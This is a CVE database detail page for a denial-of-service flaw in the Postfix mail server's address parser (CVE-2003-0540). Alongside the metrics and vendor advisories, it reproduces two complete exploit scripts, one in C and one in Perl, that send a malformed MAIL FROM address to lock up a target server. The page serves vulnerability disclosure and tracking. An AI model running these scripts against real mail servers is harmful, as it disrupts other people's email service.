CVE-2003-0540 : Detail

CVE-2003-0540

19.3%V3
Network
2003-08-05
02h00 +00:00
2017-10-09
22h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The address parser code in Postfix 1.1.12 and earlier allows remote attackers to cause a denial of service (lock) via (1) a malformed envelope address to a local host that would generate a bounce and contains the ".!" string in the MAIL FROM or Errors-To headers, which causes nqmgr to lock up, or (2) via a valid MAIL FROM with a RCPT TO containing a ".!" string, which causes an instance of the SMTP listener to lock up.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 22981

Publication date : 2003-08-03 22h00 +00:00
Author : r3b00t
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/8333/info Debian has reported two vulnerabilities in the Postfix mail transfer agent. The first vulnerability, CAN-2003-0468, can allow for an adversary to "bounce-scan" a private network. It has also been reported that this vulnerability can be exploited to use the server as a distributed denial of service tool. These attacks are reportedly possible through forcing the server to connect to an arbitrary port on an arbitrary host. The second vulnerability, CAN-2003-0540, is another denial of service. It can be triggered by a malformed envelope address and can cause the queue manager to lock up until the message is removed manually from the queue. It is also reportedly possible to lock the SMTP listener, also resulting in a denial of service. /* postfixdos.c for 1.1.12 by r3b00t <r3b00t@tx.pl> ------------------------------------------------ remote/local Postfix up to (including) 1.1.12 DoS discovered by lcamtuf <lcamtuf@coredump.cx> */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> #include <unistd.h> #include <arpa/inet.h> int sock = 0; void get_response(void); void say(char *it); int main(int argc, char* argv[]) { struct hostent *hp; struct sockaddr_in addr; printf("postfixdos.c for 1.1.12 by r3b00t <r3b00t@tx.pl>\n"); if (argc<2) { printf("usage: %s <smtpserver>\n", argv[0]); exit(0); } hp=gethostbyname(argv[1]); if (!hp) { printf("can't resolve %s\n", argv[1]); exit(0); } bzero((char *)&addr, sizeof(addr)); if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("can't create socket\n"); exit(0); } bcopy(hp->h_addr, (char *)&addr.sin_addr, hp->h_length); addr.sin_family=AF_INET; addr.sin_port=htons(25); if (connect(sock, (struct sockaddr *)&addr, sizeof(addr))!=0) { printf("can't connect to %s\n", argv[1]); close(sock); exit(0); } get_response(); say("helo host\r\n"); say("mail from: <.!>\r\n"); say("rcpt to: <someuser123@[127.0.0.1]>\r\n"); /* now should be freezed */ shutdown(sock, 2); close(sock); printf("done.\n"); return 0; } void get_response(void) { char buff[64]; recv(sock, buff, sizeof(buff), 0); if (buff[0]!='2' && buff[0]!='3') printf("%s", buff); } void say(char *it) { send(sock, it, strlen(it), 0); get_response(); }
Exploit Database EDB-ID : 22982

Publication date : 2003-08-03 22h00 +00:00
Author : daniels@legend.co.uk
EDB Verified : Yes

source: https://www.securityfocus.com/bid/8333/info Debian has reported two vulnerabilities in the Postfix mail transfer agent. The first vulnerability, CAN-2003-0468, can allow for an adversary to "bounce-scan" a private network. It has also been reported that this vulnerability can be exploited to use the server as a distributed denial of service tool. These attacks are reportedly possible through forcing the server to connect to an arbitrary port on an arbitrary host. The second vulnerability, CAN-2003-0540, is another denial of service. It can be triggered by a malformed envelope address and can cause the queue manager to lock up until the message is removed manually from the queue. It is also reportedly possible to lock the SMTP listener, also resulting in a denial of service. #!/usr/bin/perl #Remote Dos for postfix version 1.1.12 #tested on redhat 9.0, redhat 8.0, mandrake 9.0 #deadbeat, #mail: daniels@legend.co.uk # deadbeat@sdf.lonestar.org # #thanks..enjoy ;) use IO::Socket; if (!$ARGV[3]){ die "Usage:perl $0 <subject> <data> <smtp host to use>\n"; } $subject = $ARGV[0]; $junk = $ARGV[1]; $smtp_host = $ARGV[2]; $helo = "HELO $smtp_host\r\n"; $rcpt = "RCPT To:<nonexistant@127.0.0.1>\r\n"; $data = "DATA\n$junk\r\n"; $sub = "Subject: $subject\r\n"; $from = "MAIL From <.!@$smtp_host>\r\n"; print "Going to connect to $smtp_host\n"; $sox = IO::Socket::INET->new( Proto=> 'tcp', PeerPort=>'25', PeerAddr=>'$smtp_host', ); print "Connected...\n"; print $sox $helo; sleep 1; print $sox $from; sleep 1; print $sox $rcpt; sleep 1; print $sox $sub; sleep 1; print $sox $data; sleep 1; print $sox ".\r\n\r\n"; sleep 1; close $sox; print "Done..should lock up Postfix 1.1.12 and below ;)\n\n";

Products Mentioned

Configuraton 0

Wietse_venema>>Postfix >> Version 1.0.21

    Wietse_venema>>Postfix >> Version 1.1.11

      Wietse_venema>>Postfix >> Version 1.1.12

        Wietse_venema>>Postfix >> Version 1999-09-06

          Wietse_venema>>Postfix >> Version 1999-12-31

            Wietse_venema>>Postfix >> Version 2000-02-28

              Wietse_venema>>Postfix >> Version 2001-11-15

                Conectiva>>Linux >> Version 7.0

                Conectiva>>Linux >> Version 8.0

                References

                http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000717
                Tags : vendor-advisory, x_refsource_CONECTIVA
                http://www.securityfocus.com/bid/8333
                Tags : vdb-entry, x_refsource_BID
                http://www.kb.cert.org/vuls/id/895508
                Tags : third-party-advisory, x_refsource_CERT-VN
                http://marc.info/?l=bugtraq&m=106029188614704&w=2
                Tags : vendor-advisory, x_refsource_TRUSTIX
                http://www.mandriva.com/security/advisories?name=MDKSA-2003:081
                Tags : vendor-advisory, x_refsource_MANDRAKE
                http://www.redhat.com/support/errata/RHSA-2003-251.html
                Tags : vendor-advisory, x_refsource_REDHAT
                http://www.debian.org/security/2003/dsa-363
                Tags : vendor-advisory, x_refsource_DEBIAN
                http://marc.info/?l=bugtraq&m=106001525130257&w=2
                Tags : mailing-list, x_refsource_BUGTRAQ
                http://secunia.com/advisories/9433
                Tags : third-party-advisory, x_refsource_SECUNIA